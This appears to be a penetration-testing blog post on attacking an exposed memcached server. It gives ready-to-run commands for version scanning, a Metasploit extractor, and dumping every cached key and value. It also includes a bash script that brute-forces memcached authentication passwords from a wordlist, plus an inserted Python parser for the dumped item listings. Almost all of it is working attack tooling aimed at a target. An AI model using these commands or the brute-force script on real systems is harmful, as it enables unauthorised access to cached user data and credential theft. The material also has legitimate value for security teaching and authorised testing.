I ReverseShell and you?

MemcacheD Attack!

This journey starts with a memcached server to which we have access. The usual question that comes to mind is: how can I get the data it holds and exploit it in some way?

Let’s first dig into it and grab some info, starting with the version it is running:

nmap -sV --script banner -p 11211 <ip>

# or you can use telnet
telnet <ip> 11211
# and issue this command
version 

Let’s dig more into it and check the maximum number of connections it supports:

nmap --script memcached-info -p 11211 <ip>

Let’s check the current items on the memcached server:

memcstat --servers=<ip>

# and look for the item "curr_items: xx" 

Retrieve key values with the Metasploit module:

msfconsole

search memcache

use auxiliary/gather/memcached_extractor

set RHOSTS <ip>

exploit 

Retrieve all the keys present with memcdump:

memcdump --servers=<ip> 

Retrieve slabs, stats and items:

# while inside the memcached with telnet or netcat
stats slabs

stats items

# the first argument is the slab id (1 here, taken from "stats items");
# the second is how many items to dump, where 0 means all of them
stats cachedump 1 0

# and get the value of the key
get <key> 
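As an added example (not part of the original post), here is a small Python parser for the `stats items` and `stats cachedump` responses used above, so the dumped inventory can be reviewed programmatically, for instance to spot items that never expire. The sample responses are constructed, not captured from a real server.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample responses in memcached's text protocol,
# shaped like the output of "stats items" and "stats cachedump 1 0".
STATS_ITEMS_SAMPLE = """STAT items:1:number 2
STAT items:1:age 3600
STAT items:1:evicted 0
STAT items:5:number 1
STAT items:5:age 120
END
"""

CACHEDUMP_SAMPLE = """ITEM session:a1b2 [52 b; 1700000000 s]
ITEM user:42:profile [1024 b; 0 s]
END
"""

# "STAT items:<slab id>:number <count>" carries the per-slab item count.
ITEMS_RE = re.compile(r"^STAT items:(\d+):number (\d+)$")
# "ITEM <key> [<bytes> b; <exptime> s]" is one cachedump entry.
ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")


def parse_slab_ids(stats_items: str) -> Dict[int, int]:
    """Map slab id -> item count from a 'stats items' response.

    Only the ':number' counter of each slab is used; the other
    counters and the terminating END line are skipped.
    """
    slabs: Dict[int, int] = {}
    for line in stats_items.splitlines():
        m = ITEMS_RE.match(line.strip())
        if m:
            slabs[int(m.group(1))] = int(m.group(2))
    return slabs


def parse_cachedump(dump: str) -> List[Tuple[str, int, int]]:
    """Return (key, size_bytes, exptime) tuples from a 'stats cachedump' response."""
    items: List[Tuple[str, int, int]] = []
    for line in dump.splitlines():
        m = ITEM_RE.match(line.strip())
        if m:
            items.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return items


def never_expiring(items: List[Tuple[str, int, int]]) -> List[str]:
    """Keys stored with exptime 0, i.e. data that lingers until evicted."""
    return [key for key, _, exptime in items if exptime == 0]
```

Run the two parsers over the text returned by the telnet session, then iterate over `parse_slab_ids()` to issue one `stats cachedump <id> 0` per slab.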

Retrieve the value of one key:

# first check whether memcached-tool is installed and locate it
find / -name memcached-tool

memcached-tool <ip>:11211 dump 

Attack with a dictionary!

Let’s say we have a username… how do we brute-force the password if our memcached server uses authentication? Let’s use a script for that, called memcache-dictionary-attack.sh:

#!/bin/bash
# memcache-dictionary-attack.sh
# usage: ./memcache-dictionary-attack.sh <ip> <username> <wordlist>

while read -r F ; do
    echo "Trying $F"
    # memcstat prints a "Server:" line only when the credentials are accepted
    if memcstat --servers="$1" --username="$2" --password="$F" 2>/dev/null | grep -q Server ; then
        echo "Password Found: $F"
        break
    fi
done < "$3"

And fire it up against our target:

./memcache-dictionary-attack.sh <IP> <username> /usr/share/wordlists/rockyou.txt 

Now that we have the credentials we can dump the server:

memcstat --servers=<ip> --username=<user> --password=<password>

# or retrieve the value of a key, for example

memccat --servers=<ip> --username=<user> --password=<password> <key>